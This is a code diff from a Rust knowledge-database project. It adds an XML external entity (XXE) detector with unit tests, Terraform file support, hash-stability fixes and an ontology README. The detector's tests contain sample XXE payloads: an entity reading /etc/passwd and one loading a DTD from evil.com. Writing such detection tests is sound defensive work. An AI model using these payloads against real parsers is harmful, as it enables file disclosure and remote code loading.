claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"xml2js",
|
||||
0.7,
|
||||
"xml2js XML parsing - verify external entity settings",
|
||||
));
|
||||
}
|
||||
|
||||
// libxmljs (can be vulnerable)
|
||||
if let Some(m) = self.js_libxmljs.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"libxmljs",
|
||||
0.85,
|
||||
"libxmljs may be vulnerable to XXE attacks",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
// encoding/xml (safer by default, but DTD expansion can be issue)
|
||||
if let Some(m) = self.go_xml.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"encoding_xml",
|
||||
0.65,
|
||||
"Go xml package - generally safe but verify with untrusted input",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
|
||||
// Check for Java patterns (polyglot detection)
|
||||
if let Some(m) = self.java_xxe.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"java_parser",
|
||||
0.9,
|
||||
"Java XML parser - requires feature flags to prevent XXE",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_python_lxml() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
doc = etree.parse(xml_file)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("xml/parsing"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_lxml_with_defusedxml() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
import defusedxml.ElementTree as ET
|
||||
doc = etree.parse(xml_file)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
||||
|
||||
// Should still detect but with lower confidence
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].confidence < 0.6);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_elementtree() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
import xml.etree.ElementTree as ET
|
||||
tree = ET.parse(source)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "xml.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_minidom() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
from xml.dom.minidom import parse
|
||||
doc = xml.dom.minidom.parse(xml_string)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("minidom"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_sax() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
xml.sax.parse(source, handler)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_xml2js() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
xml2js.parseString(xmlData, callback);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_libxmljs() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
const doc = libxmljs.parseXml(xmlString);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_xml() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
err := xml.Unmarshal(data, &result)
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "parser.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_java_parser() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Java"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_dtd_entity() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
||||
"#;
|
||||
|
||||
// Use a non-test filename to avoid confidence reduction
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.xml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].confidence >= 0.9);
|
||||
assert!(claims[0].description.contains("XXE attack vector"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_dtd_public_entity() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "test.xml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
}
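The lxml branch above lowers confidence with two substring checks: one against the whole file and one against the matched line. The sketch below isolates that heuristic as a standalone function so its edge cases are easier to see. The function name `lxml_confidence` is hypothetical, and the two constants are copied from the diff.

```rust
/// Hypothetical standalone version of the lxml confidence branch.
fn lxml_confidence(content: &str, line: &str) -> f32 {
    // File-level check: any mention of defusedxml, including in a comment.
    // Line-level check: the exact keyword argument, with no spaces around `=`.
    if content.contains("defusedxml") || line.contains("resolve_entities=False") {
        0.5
    } else {
        0.85
    }
}
```

Because both checks are plain substring matches, a comment such as `# TODO: migrate to defusedxml` lowers the confidence for every lxml call in the file, while `resolve_entities = False` written with spaces does not. Whether that trade-off is acceptable likely depends on how downstream consumers use the confidence value.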
|
||||
@ -61,6 +61,7 @@ pub fn language_to_prefix(language: Language) -> &'static str {
|
||||
Language::GoMod => "gomod",
|
||||
Language::NpmManifest => "npm",
|
||||
Language::PythonManifest => "python",
|
||||
Language::Terraform => "terraform",
|
||||
Language::Unknown => "unknown",
|
||||
}
|
||||
}
|
||||
@ -84,6 +85,7 @@ pub fn language_to_name(language: Language) -> &'static str {
|
||||
Language::GoMod => "Go module",
|
||||
Language::NpmManifest => "NPM manifest",
|
||||
Language::PythonManifest => "Python manifest",
|
||||
Language::Terraform => "Terraform",
|
||||
Language::Unknown => "Unknown",
|
||||
}
|
||||
}
|
||||
@ -107,6 +109,7 @@ pub fn language_to_extension(language: Language) -> &'static str {
|
||||
Language::GoMod => "go",
|
||||
Language::NpmManifest => "json",
|
||||
Language::PythonManifest => "toml",
|
||||
Language::Terraform => "hcl",
|
||||
Language::Unknown => "",
|
||||
}
|
||||
}
|
||||
|
||||
@ -244,6 +244,7 @@ fn language_to_string(lang: Language) -> String {
|
||||
Language::GoMod => "gomod",
|
||||
Language::NpmManifest => "npm",
|
||||
Language::PythonManifest => "pip",
|
||||
Language::Terraform => "terraform",
|
||||
Language::Unknown => "unknown",
|
||||
}
|
||||
.to_string()
|
||||
|
||||
@ -34,6 +34,8 @@ pub enum Language {
|
||||
Dotenv,
|
||||
/// Docker files.
|
||||
Docker,
|
||||
/// Terraform files.
|
||||
Terraform,
|
||||
/// Cargo manifest.
|
||||
CargoManifest,
|
||||
/// Go module file.
|
||||
@ -62,6 +64,7 @@ impl fmt::Display for Language {
|
||||
Language::Ini => "ini",
|
||||
Language::Dotenv => "dotenv",
|
||||
Language::Docker => "docker",
|
||||
Language::Terraform => "terraform",
|
||||
Language::CargoManifest => "cargo",
|
||||
Language::GoMod => "gomod",
|
||||
Language::NpmManifest => "npm",
|
||||
@ -90,6 +93,7 @@ impl FromStr for Language {
|
||||
"ini" => Ok(Language::Ini),
|
||||
"dotenv" | "env" => Ok(Language::Dotenv),
|
||||
"docker" | "dockerfile" => Ok(Language::Docker),
|
||||
"terraform" | "tf" => Ok(Language::Terraform),
|
||||
"cargo" | "cargo.toml" => Ok(Language::CargoManifest),
|
||||
"gomod" | "go.mod" => Ok(Language::GoMod),
|
||||
"npm" | "package.json" => Ok(Language::NpmManifest),
|
||||
@ -153,6 +157,7 @@ impl Language {
|
||||
"toml" => Language::Toml,
|
||||
"json" => Language::Json,
|
||||
"ini" => Language::Ini,
|
||||
"tf" => Language::Terraform,
|
||||
_ => Language::Unknown,
|
||||
}
|
||||
}
|
||||
@ -174,6 +179,8 @@ mod tests {
|
||||
assert_eq!(Language::from_path(Path::new("go.mod")), Language::GoMod);
|
||||
assert_eq!(Language::from_path(Path::new(".env.production")), Language::Dotenv);
|
||||
assert_eq!(Language::from_path(Path::new("Dockerfile")), Language::Docker);
|
||||
assert_eq!(Language::from_path(Path::new("main.tf")), Language::Terraform);
|
||||
assert_eq!(Language::from_path(Path::new("variables.tf")), Language::Terraform);
|
||||
}
|
||||
|
||||
#[test]
|
||||
@ -201,6 +208,8 @@ mod tests {
|
||||
assert_eq!(Language::from_str("gomod").unwrap(), Language::GoMod);
|
||||
assert_eq!(Language::from_str("npm").unwrap(), Language::NpmManifest);
|
||||
assert_eq!(Language::from_str("pip").unwrap(), Language::PythonManifest);
|
||||
assert_eq!(Language::from_str("terraform").unwrap(), Language::Terraform);
|
||||
assert_eq!(Language::from_str("tf").unwrap(), Language::Terraform);
|
||||
}
|
||||
|
||||
#[test]
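The hunks above add `Terraform` in three places: the `FromStr` aliases (`"terraform" | "tf"`), the extension lookup (`"tf"`), and the display string. A minimal sketch of how those pieces fit together follows, using a cut-down `Lang` enum invented for illustration; the real `Language` enum has many more variants and its error type is not shown in this diff.

```rust
use std::str::FromStr;

/// Cut-down stand-in for the crate's `Language` enum (assumption).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum Lang {
    Terraform,
    Docker,
    Dotenv,
    Unknown,
}

impl FromStr for Lang {
    type Err = String;

    /// Accepts the canonical name and its short aliases.
    fn from_str(s: &str) -> Result<Self, Self::Err> {
        match s.to_ascii_lowercase().as_str() {
            "terraform" | "tf" => Ok(Lang::Terraform),
            "docker" | "dockerfile" => Ok(Lang::Docker),
            "dotenv" | "env" => Ok(Lang::Dotenv),
            other => Err(format!("unknown language: {other}")),
        }
    }
}

impl Lang {
    /// Maps a file extension to a language, falling back to `Unknown`.
    fn from_extension(ext: &str) -> Lang {
        match ext {
            "tf" => Lang::Terraform,
            _ => Lang::Unknown,
        }
    }
}
```

One detail visible in the diff: `language_to_extension` returns `"hcl"` for Terraform, while the extension lookup only recognizes `"tf"`, so the two mappings do not round-trip. That may be intentional if the former is used as a syntax-highlighting hint.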
|
||||
|
||||
@ -24,7 +24,7 @@ pub use verdict::Verdict;
|
||||
/// # Example
|
||||
///
|
||||
/// ```
|
||||
/// use aphoria::types::PredicateAliasSet;
|
||||
/// use aphoria::PredicateAliasSet;
|
||||
///
|
||||
/// let aliases = PredicateAliasSet::new("enabled", vec!["required", "mandatory"]);
|
||||
/// assert!(aliases.contains("enabled"));
|
||||
|
||||
@ -37,7 +37,11 @@ impl PathMapper {
|
||||
Language::JavaScript | Language::NpmManifest => "javascript",
|
||||
Language::Cpp => "cpp",
|
||||
Language::Ini => "config",
|
||||
Language::Yaml | Language::Toml | Language::Json | Language::Dotenv => "config",
|
||||
Language::Yaml
|
||||
| Language::Toml
|
||||
| Language::Json
|
||||
| Language::Dotenv
|
||||
| Language::Terraform => "config",
|
||||
Language::Docker => "docker",
|
||||
Language::Unknown => "unknown",
|
||||
};
|
||||
|
||||
@ -60,7 +60,13 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
|
||||
}
|
||||
ObjectValue::Number(n) => {
|
||||
hasher.update(b"N:");
|
||||
hasher.update(&n.to_le_bytes());
|
||||
// Round to 10 decimal places for reproducibility across JSON round-trips.
|
||||
// JSON serialization/deserialization can change the exact f64 bit pattern
|
||||
// for numbers that aren't exactly representable in decimal.
|
||||
// 10 decimal places is more than enough for real-world values while
|
||||
// surviving the decimal→binary→decimal conversion in JSON parsing.
|
||||
let s = format!("{:.10}", n);
|
||||
hasher.update(s.as_bytes());
|
||||
}
|
||||
ObjectValue::Boolean(b) => {
|
||||
hasher.update(b"B:");
|
||||
@ -79,8 +85,11 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
|
||||
hasher.update(&(assertion.source_class as u8).to_le_bytes());
|
||||
|
||||
// Confidence and timestamp
|
||||
// Use string format for confidence (f32) to survive JSON round-trips.
|
||||
// f32 has ~7 significant decimal digits, so 6 decimal places is sufficient.
|
||||
hasher.update(b":");
|
||||
hasher.update(&assertion.confidence.to_le_bytes());
|
||||
let confidence_str = format!("{:.6}", assertion.confidence);
|
||||
hasher.update(confidence_str.as_bytes());
|
||||
hasher.update(b":");
|
||||
hasher.update(&assertion.timestamp.to_le_bytes());
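The comments in these hunks explain why floats are hashed as fixed-precision decimal strings: two `f64` values that print the same at 10 decimal places can still differ in their raw bytes. The sketch below shows that effect with the standard library only. The helper names are hypothetical, and the precisions (`.10` for `f64`, `.6` for `f32`) are the ones used in the diff.

```rust
/// Hypothetical helper: canonical bytes for an f64 object value.
fn canonical_number_bytes(n: f64) -> Vec<u8> {
    // Fixed 10 decimal places, as in the hunk above.
    format!("{:.10}", n).into_bytes()
}

/// Hypothetical helper: canonical bytes for an f32 confidence.
fn canonical_confidence_bytes(c: f32) -> Vec<u8> {
    // Fixed 6 decimal places, as in the hunk above.
    format!("{:.6}", c).into_bytes()
}
```

For example, `0.1 + 0.2` and `0.3` have different bit patterns but the same canonical bytes, so a signer and a verifier that disagree only in the last bits still compute the same hash. The cost is resolution: any value with magnitude below about `1e-10` formats the same as zero, which matters if a domain stores very small quantities.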
|
||||
|
||||
|
||||
@ -1,7 +1,5 @@
|
||||
//! Record processing methods for the IngestWorker.
|
||||
//!
|
||||
//! Contains methods for ingesting assertions, votes, and epochs,
|
||||
//! including validation and signature verification.
|
||||
//! Record processing methods for the IngestWorker. Ingests assertions, votes,
|
||||
//! and epochs with validation and signature verification.
|
||||
|
||||
use super::record_types::RECORD_HEADER_SIZE;
|
||||
use super::{IngestWorker, RecordType};
|
||||
@ -327,12 +325,20 @@ impl<S: KVStore + 'static> IngestWorker<S> {
|
||||
// The hash covers: subject, predicate, object, source_hash, source_class, confidence, timestamp.
|
||||
let v2_content_hash: Option<[u8; 32]> =
|
||||
if assertion.signatures.iter().any(|s| s.version == 2) {
|
||||
// Debug: show exact number format for comparison with signing
|
||||
let object_str = match &assertion.object {
|
||||
stemedb_core::types::ObjectValue::Number(n) => format!("Number({:.17})", n),
|
||||
other => format!("{:?}", other),
|
||||
};
|
||||
let confidence_str = format!("{:.17}", assertion.confidence);
|
||||
let hash = compute_content_hash_v2(assertion);
|
||||
debug!(
|
||||
subject = %assertion.subject,
|
||||
predicate = %assertion.predicate,
|
||||
object = %object_str,
|
||||
source_hash = %hex::encode(assertion.source_hash),
|
||||
source_class = ?assertion.source_class,
|
||||
confidence = %assertion.confidence,
|
||||
confidence = %confidence_str,
|
||||
timestamp = %assertion.timestamp,
|
||||
content_hash = %hex::encode(hash),
|
||||
"Computed v2 content hash for verification"
|
||||
|
||||
177
crates/stemedb-ontology/README.md
Normal file
@ -0,0 +1,177 @@
|
# stemedb-ontology

Domain Ontology Layer for Episteme - defines how subjects are structured based on predicate type and domain. Ensures conflicts collide correctly when different sources report on the same thing.

## Module Overview

| Module | Purpose |
|--------|---------|
| `domain.rs` | Domain, EntityType, PredicateSchema, SourceTier builders |
| `subject.rs` | SubjectBuilder for canonical subject construction |
| `validator.rs` | Validates assertions against domain rules |
| `client.rs` | HTTP client for StemeDB API |
| `dto/` | Request/response DTOs for API communication |
| `pharma/` | Pharmaceutical domain (reference implementation) |

## Quick Start

### CLI Usage (steme-pharma)

```bash
# Build the CLI
cargo build --release -p stemedb-ontology

# Ingest FDA label data
./target/release/steme-pharma ingest semaglutide,tirzepatide

# Ingest with mock conflicts for testing
./target/release/steme-pharma ingest semaglutide --with-conflicts

# Query conflicts (Skeptic lens - default)
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" hba1c_reduction_percent

# Query with source hierarchy (Layered Consensus)
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" weight_loss_percent --mode layered

# Compare two drugs
./target/release/steme-pharma compare \
  "Semaglutide:Type2Diabetes" \
  "Tirzepatide:Type2Diabetes" \
  --predicate hba1c_reduction_percent

# Explore available predicates for a subject
./target/release/steme-pharma explore "Semaglutide:Type2Diabetes"

# Validate a subject/predicate combination
./target/release/steme-pharma validate "Semaglutide:Type2Diabetes" hba1c_reduction_percent

# JSON output (for scripting)
./target/release/steme-pharma --format json query "Semaglutide" nausea_rate
```

### Programmatic Usage

```rust
use stemedb_ontology::{pharma, SubjectBuilder, Validator};
use stemedb_ontology::client::StemeClient;
use stemedb_ontology::pharma::extractors::{FdaLabelExtractor, MedicalExtractor, SourceInput};
use ed25519_dalek::SigningKey;
use rand::rngs::OsRng;

// Load the pharma domain definition
let domain = pharma::definition();

// Build a subject using the ontology
let schema = domain.get_schema("efficacy").unwrap();
let mut entities = std::collections::HashMap::new();
entities.insert("Drug".to_string(), "Semaglutide".to_string());
entities.insert("Indication".to_string(), "Type2Diabetes".to_string());
let subject = SubjectBuilder::build(schema, &entities, &domain).unwrap();
assert_eq!(subject, "Semaglutide:Type2Diabetes");

// Validate assertions
let validator = Validator::new(&domain);
let result = validator.validate("hba1c_reduction_percent", &subject, 0.95);
assert!(result.is_ok());

// Extract and ingest claims
let client = StemeClient::new("http://localhost:18180");
let extractor = FdaLabelExtractor::new();
let signing_key = SigningKey::generate(&mut OsRng);
let agent_id = signing_key.verifying_key().to_bytes();
let hlc = uhlc::HLCBuilder::new().build();

let claims = extractor.extract(&SourceInput::DrugName("semaglutide".into())).await?;
for claim in claims {
    let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
    let hash = client.assert(&assertion).await?;
    println!("Ingested: {}", hash);
}

// Query for conflicts
let skeptic = client.skeptic("Semaglutide:Type2Diabetes", "hba1c_reduction_percent").await?;
println!("Conflict score: {}", skeptic.conflict_score);
```

## Architecture

```
                    ┌─────────────────────────────────────┐
                    │          Domain Definition          │
                    │  (EntityTypes, Schemas, Hierarchy)  │
                    └──────────────┬──────────────────────┘
                                   │
           ┌───────────────────────┼───────────────────────┐
           │                       │                       │
           v                       v                       v
  ┌─────────────────┐   ┌──────────────────┐   ┌──────────────────┐
  │ SubjectBuilder  │   │ Validator        │   │ MedicalExtractor │
  │                 │   │                  │   │ (trait)          │
  │ Build canonical │   │ Validate against │   │ Extract claims   │
  │ subject strings │   │ domain rules     │   │ from sources     │
  └────────┬────────┘   └────────┬─────────┘   └────────┬─────────┘
           │                     │                      │
           └──────────────┬──────┴──────────────────────┘
                          │
                          v
                ┌───────────────────┐
                │    StemeClient    │
                │                   │
                │ Submit assertions │
                │ Query with lenses │
                └─────────┬─────────┘
                          │
                          v
                ┌───────────────────┐
                │    StemeDB API    │
                │    :18180/v1/*    │
                └───────────────────┘
```

## Subject Patterns

Different predicate types use different subject structures to ensure proper collision:

| Category | Pattern | Example | Use Case |
|----------|---------|---------|----------|
| Efficacy | `{Drug}:{Indication}` | `Semaglutide:Type2Diabetes` | Outcome measures for specific conditions |
| Safety | `{Drug}` | `Semaglutide` | Adverse events (apply across indications) |
| Mechanism | `{Drug}:{Target}` | `Semaglutide:GLP1R` | Pharmacology details |
| Comparison | `{Drug}:{Comparator}:{Indication}` | `Semaglutide:Tirzepatide:Type2Diabetes` | Head-to-head trials |

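The patterns in the table above can be read as simple placeholder templates. The following is a minimal sketch of that idea, not the crate's `SubjectBuilder`: the helper `build_subject` and its signature are hypothetical, and it assumes every pattern is a colon-separated list of `{Entity}` placeholders.

```rust
use std::collections::HashMap;

/// Hypothetical helper (not part of stemedb-ontology): fill the `{Entity}`
/// placeholders of a subject pattern from a map of entity values.
/// Returns `None` if a segment is malformed or an entity is missing.
fn build_subject(pattern: &str, entities: &HashMap<&str, &str>) -> Option<String> {
    let mut parts = Vec::new();
    for segment in pattern.split(':') {
        // Each segment is expected to look like "{Drug}".
        let name = segment.strip_prefix('{')?.strip_suffix('}')?;
        parts.push(*entities.get(name)?);
    }
    Some(parts.join(":"))
}

fn main() {
    let mut entities = HashMap::new();
    entities.insert("Drug", "Semaglutide");
    entities.insert("Indication", "Type2Diabetes");

    // Efficacy claims are keyed by drug and indication.
    let efficacy = build_subject("{Drug}:{Indication}", &entities);
    // Safety claims are keyed by drug alone, so they collide across indications.
    let safety = build_subject("{Drug}", &entities);

    println!("{:?} {:?}", efficacy, safety);
}
```

Because two sources reporting an efficacy number for the same drug and indication produce the same subject string, their claims land on the same key and can be compared; a source that omits the indication would not collide with them.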
## Source Hierarchy

Claims are weighted by source authority:

| Tier | Source Class | Weight | Examples |
|------|--------------|--------|----------|
| 0 | Regulatory | 1.0 | FDA Labels, EMA Reports |
| 1 | Clinical | 0.9 | Phase III RCTs, Lancet, NEJM |
| 2 | Observational | 0.7 | Real-World Evidence, FAERS |
| 3 | Expert | 0.5 | Guidelines, ADA Standards |
| 4 | Community | 0.3 | PatientsLikeMe, Moderated Forums |
| 5 | Anecdotal | 0.1 | Reddit, Twitter, Blog Posts |

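To make the weighting concrete, here is a small sketch that encodes the table as a lookup. The local `SourceClass` enum is a stand-in for the real type in `stemedb_core`, and multiplying the tier weight by a claim's confidence is only an assumption for illustration; how the lenses actually combine the two is not specified here.

```rust
/// Stand-in for the real `SourceClass`, ordered from most to least authoritative.
#[derive(Debug, Clone, Copy, PartialEq)]
enum SourceClass {
    Regulatory,
    Clinical,
    Observational,
    Expert,
    Community,
    Anecdotal,
}

impl SourceClass {
    /// Tier weights copied from the table above.
    fn weight(self) -> f32 {
        match self {
            SourceClass::Regulatory => 1.0,
            SourceClass::Clinical => 0.9,
            SourceClass::Observational => 0.7,
            SourceClass::Expert => 0.5,
            SourceClass::Community => 0.3,
            SourceClass::Anecdotal => 0.1,
        }
    }
}

/// Assumption for illustration: score = tier weight * claim confidence.
fn weighted_score(class: SourceClass, confidence: f32) -> f32 {
    class.weight() * confidence
}

fn main() {
    let label = weighted_score(SourceClass::Regulatory, 0.9);
    let forum_post = weighted_score(SourceClass::Anecdotal, 0.9);
    println!("regulatory: {:.2}, anecdotal: {:.2}", label, forum_post);
}
```

Under this assumption, two claims with the same stated confidence still rank differently once the tier of their source is taken into account.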
## Adding a New Domain

See [Adding a Domain Guide](../../docs/guides/adding-a-domain.md) for step-by-step instructions on implementing new domains (e.g., cardiology, finance).

## Testing

```bash
# Run all ontology tests
cargo test -p stemedb-ontology

# Run with output
cargo test -p stemedb-ontology -- --nocapture

# Consumer Health UAT
cargo test -p stemedb-ontology --test consumer_health_uat
```

## Related Documentation

- [What is Episteme](../../what-is-episteme.md)
- [Architecture](../../architecture.md)
- [Vision](../../vision.md)
- [Consumer Health Use Case](../../docs/app-concepts/consumer-health.md)
||||
@ -40,21 +40,26 @@ pub async fn run_ingest(
|
||||
// Extract and ingest FDA claims
|
||||
if !args.mock_only {
|
||||
let extractor = FdaLabelExtractor::new();
|
||||
let drugs: Vec<&str> = args.drugs.split(',').map(str::trim).collect();
|
||||
let total_drugs = drugs.len();
|
||||
|
||||
for drug in args.drugs.split(',') {
|
||||
let drug = drug.trim();
|
||||
println!("--- Ingesting {} (FDA) ---", drug);
|
||||
for (drug_idx, drug) in drugs.iter().enumerate() {
|
||||
println!("--- [{}/{}] Ingesting {} (FDA) ---", drug_idx + 1, total_drugs, drug);
|
||||
|
||||
match extractor.extract(&SourceInput::DrugName(drug.to_string())).await {
|
||||
match extractor.extract(&SourceInput::DrugName((*drug).to_string())).await {
|
||||
Ok(claims) => {
|
||||
info!(drug = drug, claims_count = claims.len(), "Extracted FDA claims");
|
||||
for claim in claims {
|
||||
let claims_count = claims.len();
|
||||
info!(drug = drug, claims_count = claims_count, "Extracted FDA claims");
|
||||
|
||||
for (claim_idx, claim) in claims.iter().enumerate() {
|
||||
let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
|
||||
match client.assert(&assertion).await {
|
||||
Ok(hash) => {
|
||||
total_ingested += 1;
|
||||
println!(
|
||||
" [Regulatory] {} = {} -> {}...",
|
||||
" [{}/{}] [Regulatory] {} = {} -> {}...",
|
||||
claim_idx + 1,
|
||||
claims_count,
|
||||
claim.predicate,
|
||||
format_value(&claim.value),
|
||||
&hash[..16]
|
||||
@ -63,7 +68,13 @@ pub async fn run_ingest(
|
||||
Err(e) => {
|
||||
total_errors += 1;
|
||||
warn!(error = %e, predicate = %claim.predicate, "Failed to ingest");
|
||||
println!(" [ERROR] {} -> {}", claim.predicate, e);
|
||||
println!(
|
||||
" [{}/{}] [ERROR] {} -> {}",
|
||||
claim_idx + 1,
|
||||
claims_count,
|
||||
claim.predicate,
|
||||
e
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -105,7 +105,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.post(&url).json(&request).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -170,7 +176,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -223,7 +235,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -286,7 +304,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -329,7 +353,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
|
||||
@ -92,6 +92,12 @@ impl Journal {
|
||||
})?;
|
||||
guard.write(&buf)?;
|
||||
|
||||
// Update the cached segment size to reflect the write.
|
||||
// This ensures read() can use the cached size for bounds checking.
|
||||
let new_file_size =
|
||||
guard.file().metadata().map_err(|e| QuarantineError::io(guard.path(), e))?.len();
|
||||
self.segment_mgr.update_current_segment_size(new_file_size);
|
||||
|
||||
let offset = self.current_offset;
|
||||
self.current_offset += record.disk_size();
|
||||
|
||||
|
||||
@ -147,6 +147,17 @@ impl SegmentManager {
|
||||
current_segment_size >= self.max_segment_size
|
||||
}
|
||||
|
||||
/// Update the cached size of the current (latest) segment.
|
||||
///
|
||||
/// Call this after appending data to keep the cached size in sync with
|
||||
/// the actual file size. This ensures that `read()` operations can use
|
||||
/// the cached size for bounds checking without a disk stat call.
|
||||
pub fn update_current_segment_size(&mut self, new_size: u64) {
|
||||
if let Some(segment) = self.segments.last_mut() {
|
||||
segment.size = new_size;
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new segment with the given base offset.
|
||||
///
|
||||
/// Writes a v2 FileHeader to the new file and adds it to the segment list.
|
||||
|
||||
590
docs/guides/adding-a-domain.md
Normal file
@ -0,0 +1,590 @@
|
# Adding a New Domain to stemedb-ontology
